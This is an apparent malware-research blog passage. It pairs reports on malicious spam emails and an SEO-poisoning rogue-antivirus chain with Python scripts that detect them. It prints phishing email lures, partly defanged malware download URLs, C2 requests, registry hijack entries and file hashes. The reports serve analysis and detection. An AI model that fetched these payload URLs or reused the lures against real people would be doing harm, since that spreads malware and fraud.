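# Samples transcribed from the header fragments quoted in the posts.
UPS_HEADERS = (
    "Return-Path: <info52943@ups.com>\n"
    "Received: from [39.203.6.87] (account 1361@ms21.hinet.net"
    " HELO ybydypsmsb.cehflcrileuz.ru)\n"
    'From: "United Parcel Service" <info52943@ups.com>\n'
    "Subject: United Parcel Service notification #46034\n\n"
)
BOBIJOU_HEADERS = (
    "Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)\n"
    'From: " Bobijou Inc" <premierednxez86@expdel.com>\n'
    "Subject: Successfull Order 386284\n"
    "Return-Path: <premierednxez86@expdel.com>\n\n"
)
# Constructed control message of the shape a normal MTA chain produces.
CONTROL_HEADERS = (
    "Return-Path: <news@example.com>\n"
    "Received: from mail.example.com (mail.example.com [192.0.2.10])"
    " by mx.example.net with ESMTP\n"
    'From: "Example News" <news@example.com>\n'
    "Subject: Weekly update\n\n"
)

HELO_RE = re.compile(r"\b(?:helo=|HELO\s+)([A-Za-z0-9.-]+)", re.I)
ORIGIN_RE = re.compile(r"\bfrom\s+(\[?[A-Za-z0-9.:-]+\]?)", re.I)
IP_LITERAL_RE = re.compile(r"^\[\d{1,3}(?:\.\d{1,3}){3}\]$")


def registrable(host):
    """Crude organisation part of a host name: its last two labels.
    Fine for .com/.ru/.org; use the Public Suffix List for co.uk, com.br, ..."""
    labels = host.strip("[]").lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def address_domain(header_value):
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def triage(raw_headers):
    msg = message_from_string(raw_headers)
    from_dom = address_domain(msg.get("From"))
    rp_dom = address_domain(msg.get("Return-Path"))
    received = msg.get_all("Received") or []
    # Each hop prepends its own Received header, so the last one is the
    # first hop: the host that injected the message into the mail system.
    origin = received[-1] if received else ""
    helo_m = HELO_RE.search(origin)
    helo = helo_m.group(1) if helo_m else ""
    origin_m = ORIGIN_RE.search(origin)
    origin_host = origin_m.group(1) if origin_m else ""

    findings = {
        "from_domain": from_dom,
        "helo": helo,
        # the injecting host introduced itself under a name unrelated to From
        "helo_mismatch": bool(helo) and registrable(helo) != registrable(from_dom),
        # envelope sender and header From disagree
        "return_path_mismatch": bool(rp_dom) and rp_dom != from_dom,
        # first hop is a bare IP literal with no reverse name: typical of a bot
        "origin_is_bare_ip": bool(IP_LITERAL_RE.match(origin_host)),
    }
    reasons = [k for k in ("helo_mismatch", "return_path_mismatch",
                           "origin_is_bare_ip") if findings[k]]
    findings["reasons"] = reasons
    findings["verdict"] = "suspicious" if reasons else "ok"
    return findings


if __name__ == "__main__":
    for name, hdrs in (("UPS", UPS_HEADERS), ("Bobijou", BOBIJOU_HEADERS),
                       ("control", CONTROL_HEADERS)):
        result = triage(hdrs)
        print(f"{name}: {result['verdict']} {result['reasons']}")
```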

Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

Attached is a file with a ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates the following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net

Malware: Successfull Order 386284

Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.

This message is to inform you that your order has been received and is currently
being processed.

Your order reference is 061042.
You will need this in all correspondence.

This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.

You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and

Malware: Nova cotacao…

The honeypot reported a suspicious email:

Return-Path: <apache@94.229.165.236.srvlist.ukfast.net>
Received: from 94.229.165.236.srvlist.ukfast.net (94.229.165.236.srvlist.ukfast.net [94.229.165.236])
Received: from 94.229.165.236.srvlist.ukfast.net (unknown [127.0.0.1]) by 94.229.165.236.srvlist.ukfast.net
Received: by 94.229.165.236.srvlist.ukfast.net (Postfix, from userid 48)
Subject: Nova cotacao...
Date: Tue, 26 Apr 2011 07:14:29 +0100 (BST)

This is the malicious URL contained in the message:

gwayprototype. com/support/img/thumb2.php?#documento_relatorio
HTTP/1.1 302 Object Moved
Location: http://www.abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr
Server: Microsoft-IIS/4.0
Content-Type: text/html
Connection: close
Content-Length: 174

It redirects to the download of the infected file:

abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr

Report date: 2011-04-25 23:05:38 (GMT 1)
File name: planilha-documento-scr
File size: 157184 bytes
File type: Executable File (EXE)
MD5 hash: 3e66cfb35fee0edeb86da90b0ef780d2
SHA1 hash: 18fdccc4927ad848e74ac742270a1673bf74c7bc
Detection rate: 5 on 10 (50%)
Status: INFECTED

AVG 25/04/2011 10.0.0.1190 Downloader.Rozena
Comodo 25/04/2011 4.0 TrojWare.Win32.Troja..
Emsisoft 25/04/2011 5.1.0.2 Trojan-PWS.Win32.QQR..
F-Prot 25/04/2011 6.3.3.4884 W32/SuspPack.R.gen!E..
Ikarus 25/04/2011 T31001097 Trojan-PWS.Win32.QQR..

Image of file:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/abeonas.net
http://www.urlvoid.com/scan/gwayprototype.com

Suspicious activity for .co.cc domains

While doing some Google searches for particular keywords, we noticed that in some cases the websites found have the same URL after the .co.cc part and that all of them use a $_GET['k'] query related to the keyword I was searching for. Almost all the links found also share the same HTML template and look like non-live websites; maybe they are used to capture keywords or are related to some kind of SEO poisoning activity:

Image

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what? A fake scanner page…

Image

Image

A popup window prompts the user to download the rogue security software setup:

Image

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file appears to be almost undetected by antivirus engines:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN
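The chain above has three observable stages: a keyword-keyed index.php?k= landing page on a throwaway .co.cc host, a 302 into a traffic-distribution script (in.cgi?...&seoref=...), and setup.exe pushed as an attachment under the made-up MIME type application/download. The following Python is an added example, not code from the original post or from NoVirusThanks; the transactions are constructed from the captures above (hosts re-fanged so they parse), the THROWAWAY_ZONES list is an assumption limited to the zones seen in this post, and the in.cgi hop itself is represented only by its Location header because the post does not show it.

```python
"""Flag the SEO-poisoning chain captured above in a list of HTTP transactions:
keyword landing page on a throwaway .co.cc host, 302 into a traffic-distribution
script (in.cgi?...&seoref=...), then setup.exe pushed as an attachment."""
import re
from urllib.parse import parse_qs, urlsplit

# Free sub-domain zones that appear in the post; a deployment would load a fuller list.
THROWAWAY_ZONES = (".co.cc", ".cz.cc")

# Transactions constructed from the captures in the post:
# (request line, Host header, raw response headers).
CAPTURE = [
    ("GET /index.php?k=virus-scan HTTP/1.1", "liostimoremvfk.co.cc",
     "HTTP/1.1 302 Found\r\n"
     "Location: http://includingwhich.cz.cc/in.cgi?4&seoref=[...]\r\n"
     "Content-Type: text/html\r\n"),
    ("GET /get_file.php?id=16 HTTP/1.1", "mywebavck-2.co.cc",
     "HTTP/1.1 200 OK\r\n"
     "Content-Description: File Transfer\r\n"
     "Content-Length: 331776\r\n"
     'Content-Disposition: attachment; filename="setup.exe"\r\n'
     "Content-Type: application/download\r\n"),
    # Benign control: the same kind of query on an ordinary host.
    ("GET /index.php?k=virus-scan HTTP/1.1", "www.example.org",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"),
]


def parse_response(raw):
    """Split raw response headers into (status code, {lower-case name: value})."""
    lines = raw.strip().split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def is_throwaway(host):
    return host.lower().rstrip(".").endswith(THROWAWAY_ZONES)


def tag_transaction(request_line, host, raw_response):
    tags = []
    target = request_line.split()[1]
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    status, headers = parse_response(raw_response)
    # 1. keyword-keyed landing page: index.php?k=<search term> on a throwaway zone
    if is_throwaway(host) and "k" in query:
        tags.append("seo_keyword_landing")
    # 2. redirect into a traffic-distribution script carrying the search referer
    loc = urlsplit(headers.get("location", ""))
    if 300 <= status < 400 and loc.path.endswith("/in.cgi") \
            and "seoref" in parse_qs(loc.query, keep_blank_values=True):
        tags.append("tds_redirect")
    # 3. an executable forced on the browser as an attachment
    disp = headers.get("content-disposition", "")
    fname = re.search(r'filename="?([^";]+)"?', disp, re.I)
    if "attachment" in disp.lower() and fname and fname.group(1).lower().endswith(".exe"):
        tags.append("forced_exe_download")
    return tags


def has_rogue_av_chain(transactions):
    """True once a landing+redirect pair is followed by an .exe pushed from a throwaway host."""
    redirected = False
    for request_line, host, raw_response in transactions:
        tags = tag_transaction(request_line, host, raw_response)
        if "seo_keyword_landing" in tags and "tds_redirect" in tags:
            redirected = True
        elif redirected and "forced_exe_download" in tags and is_throwaway(host):
            return True
    return False


if __name__ == "__main__":
    for request_line, host, raw_response in CAPTURE:
        print(host, tag_transaction(request_line, host, raw_response))
    print("rogue AV chain:", has_rogue_av_chain(CAPTURE))
```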

A few malicious .co.cc domains used to capture keywords:


Note that the value after k= is the same as the page title!

Other related malicious domains:


All these malicious domains appear to be hosted on this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217